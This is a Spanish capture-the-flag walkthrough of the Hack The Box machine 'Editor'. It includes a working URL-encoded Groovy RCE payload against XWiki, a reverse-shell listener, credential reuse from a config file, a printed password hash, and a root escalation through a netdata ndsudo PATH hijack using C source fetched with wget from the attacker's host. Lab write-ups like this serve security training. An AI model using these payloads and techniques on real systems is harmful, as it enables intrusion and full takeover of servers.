Post

Editor - HTB

Editor - HTB

Enumeration

Vamos a realizar un escaneo nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(pylon㉿kali)-[10.10.14.209]-[~/…/pylon/HTB/Editor/nmap]
└─$ nmap -p- --open -sS -n -Pn -vvv --min-rate=5000 10.10.11.80          
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-09-17 22:12 CEST
Initiating SYN Stealth Scan at 22:12
Scanning 10.10.11.80 [65535 ports]
Discovered open port 22/tcp on 10.10.11.80
Discovered open port 80/tcp on 10.10.11.80
Discovered open port 8080/tcp on 10.10.11.80
Completed SYN Stealth Scan at 22:12, 11.70s elapsed (65535 total ports)
Nmap scan report for 10.10.11.80
Host is up, received user-set (0.044s latency).
Scanned at 2025-09-17 22:12:11 CEST for 12s
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
80/tcp   open  http       syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 11.77 seconds
           Raw packets sent: 65535 (2.884MB) | Rcvd: 65535 (2.621MB)

Vamos a realizar un segundo escaneo para averiguar que servicios y versiones corren en cada:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(pylon㉿kali)-[10.10.14.209]-[~/…/pylon/HTB/Editor/nmap]
└─$ nmap -p22,80,8080 -sCV 10.10.11.80              
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-09-17 22:12 CEST
Nmap scan report for editor.htb (10.10.11.80)
Host is up (0.044s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Editor - SimplistCode Pro
8080/tcp open  http    Jetty 10.0.20
| http-title: XWiki - Main - Intro
|_Requested resource was <http://editor.htb:8080/xwiki/bin/view/Main/>
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-webdav-scan: 
|   Server Type: Jetty(10.0.20)
|   WebDAV type: Unknown
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Jetty(10.0.20)
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 8.38 seconds

Vamos a acceder a la aplicación web principal:

Viendo la web en el footer encontré lo siguiente:

Vemos un subdominio llamado wiki . Vamos a realizar un escaneo de vhost con gobuster para confirmarlo y saber que existan más:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(pylon㉿kali)-[10.10.14.209]-[~/…/pylon/HTB/Editor/nmap]
└─$ gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u <http://editor.htb/> --append-domain
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                       <http://editor.htb/>
[+] Method:                    GET
[+] Threads:                   10
[+] Wordlist:                  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:                gobuster/3.8
[+] Timeout:                   10s
[+] Append Domain:             true
[+] Exclude Hostname Length:   false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
wiki.editor.htb Status: 302 [Size: 0] [--> <http://wiki.editor.htb/xwiki>]
Progress: 4989 / 4989 (100.00%)
===============================================================
Finished
===============================================================

Vamos a añadirlo a nuestro /etc/hosts . Ahora accedamos a él:

Vemos que está empleando Xwiki .

XWiki es un motor wiki basado en Java.

Si vemos el footer encontramos lo siguiente:

Si buscamos esa versión en Google podremos encontrar lo siguiente:

En este caso vi la de OffSec:

Shell as xwiki

Si leemos este PoC podremos ver que estamos ante un RCE, con el siguiente payload:

1
/xwiki/bin/view/Main/SolrSearchMacros?search=groovy:java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')"

El payload que al final me funcionó fue:

1
/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

Vamos a enviarnos una reverse shell:

1
2
3
┌──(pylon㉿kali)-[10.10.14.209]-[~/Desktop/pylon/HTB/Editor]
└─$ nc -nlvp 9001
listening on [any] 9001 ...

1
2
3
4
┌──(pylon㉿kali)-[10.10.14.209]-[~/Desktop/pylon/HTB/Editor]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.209] from (UNKNOWN) [10.10.11.80] 58230

Si hacemos un whoami veremos que somos el usuario xwiki :

1
2
whoami
xwiki

Si nos fijamos haciendo un pwd veremos que estamos en el siguiente directorio:

1
2
xwiki@editor:/usr/lib/xwiki-jetty$ pwd
/usr/lib/xwiki-jetty

Shell as oliver

Investigando por la documentación y foros leí que los datos de la conexión de la base de datos se guardan en un archivo llamado hibernate.cfg.xml , vamos a buscarlo con find :

1
2
3
4
5
xwiki@editor:/usr/lib/xwiki-jetty$ find / -name hibernate.cfg.xml 2>/dev/null 
/etc/xwiki/hibernate.cfg.xml
/usr/lib/xwiki/WEB-INF/hibernate.cfg.xml
/usr/share/xwiki/templates/mysql/hibernate.cfg.xml
xwiki@editor:/usr/lib/xwiki-jetty$ 

Vemos que tenemos varios, vamos a leer el primero filtrando por las 2 siguientes palabras:

  • username
  • password

Tenemos el usuario de la base de datos que es xwiki , vamos a buscar su contraseña:

Bien!! Tenemos credenciales. Vamos a probarlas en MySQL :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
xwiki@editor:/usr/lib/xwiki-jetty$ mysql -u xwiki -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \\g.
Your MySQL connection id is 14
Server version: 8.0.42-0ubuntu0.22.04.2 (Ubuntu)

Copyright (c) 2000, 2025, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.

mysql> 

Tenemos acceso a la base de datos. Investigando un rato sobre ella solo encontré un hash del usuario neal , pero si hacemos un cat /etc/passwd veremos que solo existe el usuario oliver :

1
2
3
4
5
xwiki@editor:/usr/lib/xwiki-jetty$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash

neal hash:

1
hash:SHA-512:dac65976a9f09bcd15bd2c5c6eae4c43b06f316be7ae6b191db26580b1211bef:6b8f547e3742e998380da4f9d426773430a7982a946b9bfd94da0d7abe0d472c5ff08fcb8b0a908bc293da82298053ba3 48872099bd88f059a7838c38b670153

Vamos a probar las mismas credenciales encontradas por SSH en el usuario oliver a ver si hay reutilización de credenciales, una practica muy común:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(pylon㉿kali)-[10.10.14.209]-[~/…/pylon/HTB/Editor/content]
└─$ ssh oliver@10.10.11.80
oliver@10.10.11.80's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)

 * Documentation:  <https://help.ubuntu.com>
 * Management:     <https://landscape.canonical.com>
 * Support:        <https://ubuntu.com/pro>

 System information as of Thu Sep 18 08:48:15 AM UTC 2025

  System load:  0.03              Processes:             229
  Usage of /:   64.9% of 7.28GB   Users logged in:       0
  Memory usage: 52%               IPv4 address for eth0: 10.10.11.80
  Swap usage:   0%

Expanded Security Maintenance for Applications is not enabled.

4 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

4 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at <https://ubuntu.com/esm>

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings

Last login: Thu Sep 18 08:48:16 2025 from 10.10.14.209
oliver@editor:~$ 

Shell as root

Si buscamos por archivos con el permiso SUID encontraremos unos no vistos normalmente:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
oliver@editor:~$ find / -perm -4000 2>/dev/null -ls
    49126    944 -rwsr-x---   1 root     netdata    965056 Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
    49412   1348 -rwsr-x---   1 root     netdata   1377624 Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
    49409   1120 -rwsr-x---   1 root     netdata   1144224 Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
    49411    196 -rwsr-x---   1 root     netdata    200576 Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
    49407     80 -rwsr-x---   1 root     netdata     81472 Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping
    49413    876 -rwsr-x---   1 root     netdata    896448 Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
    49402   4164 -rwsr-x---   1 root     netdata   4261672 Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
      819     40 -rwsr-xr-x   1 root     root        40496 Feb  6  2024 /usr/bin/newgrp
      298     72 -rwsr-xr-x   1 root     root        72072 Feb  6  2024 /usr/bin/gpasswd
    12457     56 -rwsr-xr-x   1 root     root        55680 Apr  9  2024 /usr/bin/su
     9922     36 -rwsr-xr-x   1 root     root        35200 Apr  9  2024 /usr/bin/umount
      296     44 -rwsr-xr-x   1 root     root        44808 Feb  6  2024 /usr/bin/chsh
      681     36 -rwsr-xr-x   1 root     root        35200 Mar 23  2022 /usr/bin/fusermount3
      676    228 -rwsr-xr-x   1 root     root       232416 Jun 25 12:48 /usr/bin/sudo
      299     60 -rwsr-xr-x   1 root     root        59976 Feb  6  2024 /usr/bin/passwd
      745     48 -rwsr-xr-x   1 root     root        47488 Apr  9  2024 /usr/bin/mount
      295     72 -rwsr-xr-x   1 root     root        72712 Feb  6  2024 /usr/bin/chfn
     1409     36 -rwsr-xr--   1 root     messagebus    35112 Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    14070    332 -rwsr-xr-x   1 root     root         338536 Apr 11 12:05 /usr/lib/openssh/ssh-keysign
    13665     20 -rwsr-xr-x   1 root     root          18736 Feb 26  2022 /usr/libexec/polkit-agent-helper-1

Investigando sobre el binario /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo encontré lo siguiente:

Se ve que se puede escalar privilegios con el. Para ello necesitaremos compilar un archivo llamado nvme , vamos a crear en C un código que simplemente ejecute una /bin/bash :

1
2
3
4
5
6
7
 #include <unistd.h>
 
 int main() {
     setuid(0); setgid(0);
     execl("/bin/bash", "bash", NULL);
     return 0;
 }

Ahora vamos a compilarlo con el nombre nvme :

1
2
┌──(pylon㉿kali)-[10.10.14.209]-[~/…/pylon/HTB/Editor/exploits]
└─$ gcc privesc.c -o nvme

Ahora lo subiremos a la máquina en un directorio donde tengamos permisos, en mi caso en el /tmp :

1
2
3
┌──(pylon㉿kali)-[10.10.14.209]-[~/…/pylon/HTB/Editor/exploits]
└─$ python -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (<http://0.0.0.0:9090/>) ...
1
2
3
4
5
6
7
8
9
10
oliver@editor:/tmp$ wget 10.10.14.209:9090/nvme
--2025-09-18 08:52:12--  <http://10.10.14.209:9090/nvme>
Connecting to 10.10.14.209:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16056 (16K) [application/octet-stream]
Saving to: ‘nvme’

nvme                                          100%[=================================================================================================>]  15.68K  --.-KB/s    in 0.04s   

2025-09-18 08:52:12 (356 KB/s) - ‘nvme’ saved [16056/16056]

Le daremos permisos de ejecución:

1
oliver@editor:/tmp$ chmod +x nvme 

Ahora modificaremos la variable de entorno PATH para indicar que busque el binario primero desde tmp :

1
2
3
oliver@editor:/tmp$ PATH=/tmp:$PATH
oliver@editor:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

Ahora vamos a ejecutar el binario ndsudo con el comando nvme-list que si vemos en -h ejecuta el ejecutable nvme :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo -h

ndsudo

(C) Netdata Inc.

A helper to allow Netdata run privileged commands.

  --test
    print the generated command that will be run, without running it.

  --help
    print this message.

The following commands are supported:

- Command    : nvme-list
  Executables: nvme 
  Parameters : list --output-format=json

Entonces indicaremos nvme-list :

1
2
3
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
root@editor:/tmp# whoami
root

This post is licensed under CC BY 4.0 by the author.